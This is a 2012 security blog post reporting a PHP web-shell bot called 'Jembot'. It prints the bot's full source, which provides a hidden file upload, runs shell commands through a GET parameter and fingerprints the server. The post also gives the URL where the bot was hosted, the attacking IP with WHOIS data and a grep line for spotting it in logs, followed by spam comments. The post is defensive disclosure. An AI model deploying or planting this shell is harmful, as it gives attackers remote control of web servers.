вторник, 17 апреля 2012 г.

Find new web bot [Jembot]

We have discovered a new kind of bot that spreads in the form of web shells, called Jembot.
Source code:

<?php
if(isset($_GET['jembot']))
{
echo "<body bgcolor=black>
<font color=cyan size=3>";
echo "<h2>empixcrew technology</h2><hr>";
    echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
<label for=\"file\">empix:</label>
<input type=\"file\" name=\"file\" id=\"file\" />
<br />
<input type=\"submit\" name=\"submit\" value=\"uplod\">
</form>";
if ($_FILES["file"]["error"] > 0)
  {
  echo "gagal: " . $_FILES["file"]["error"] . "<br />";
  }
else
  {
  echo "sukses: " . $_FILES["file"]["name"] . "<br />";
  echo "ukuran: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
  echo "mentah: " . $_FILES["file"]["tmp_name"];
  }
if (file_exists("" . $_FILES["file"]["name"]))
      {
      echo $_FILES["file"]["name"] . " wes enek cok. ";
      }
    else
      {
      move_uploaded_file($_FILES["file"]["tmp_name"],
      "" . $_FILES["file"]["name"]);
      echo " mateng: " . "" . $_FILES["file"]["name"];
echo"<hr>";
      }
  }
elseif ($_GET["empix"]){
system($_GET["empix"]);
}
else {
$un = php_uname();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
echo "empixcrew: $un $php1 :empixcrew";
}
?>
</style><embed src="http://empixcrew.net/gaza.swf" autostart="true" hidden="true"><SCRIPT> 
Location of bot source: http://picasa.com.ipsupply.com.au/wp-content/uploads/2011/12/chase/hell
.php

Attacks coming from IP 187.17.65.242 Brasil

WHOIS:
inetnum: 187.17.64/18 aut-num: AS15201 abuse-c: SEO50 owner: Universo Online S.A. ownerid: 001.109.184/0001-95 responsible: Contato da Entidade UOL country: BR owner-c: CAU12 tech-c: CAU12 inetrev: 187.17.64/20 nserver: ns1.host.uol.com.br nsstat: 20120412 AA nslastaa: 20120412 nserver: ns2.host.uol.com.br nsstat: 20120412 AA nslastaa: 20120412 created: 20081022 changed: 20081022 
nic-hdl-br: CAU12 person: Contato Administrativo - UOL e-mail: l-registrobr-uol@corp.uol.com.br created: 20031202 changed: 20100106 
nic-hdl-br: SEO50 person: Security Office e-mail: security@uol.com.br created: 20021114 changed: 20110830 
We strongly recommend to block this ip address and run the following command to detect attacks:
#egrep -n --color "hell.php" *.log

9 комментариев:

  1. Oh my goodness! an amazing article dude. Thank you However I am experiencing issue with ur rss. Don’t know why Unable to subscribe to it. Is there anyone getting identical rss problem? Anyone who knows kindly respond. Thnkx

    En.gravatar.com
    Information
    Click Here
    Visit Web

    ОтветитьУдалить
  2. There are certainly a lot of details like that to take into consideration. That is a great point to bring up. I offer the thoughts above as general inspiration but clearly there are questions like the one you bring up where the most important thing will be working in honest good faith. I don?t know if best practices have emerged around things like that, but I am sure that your job is clearly identified as a fair game. Both boys and girls feel the impact of just a moment’s pleasure, for the rest of their lives.

    Tinychat.com
    Information
    Click Here
    Visit Web

    ОтветитьУдалить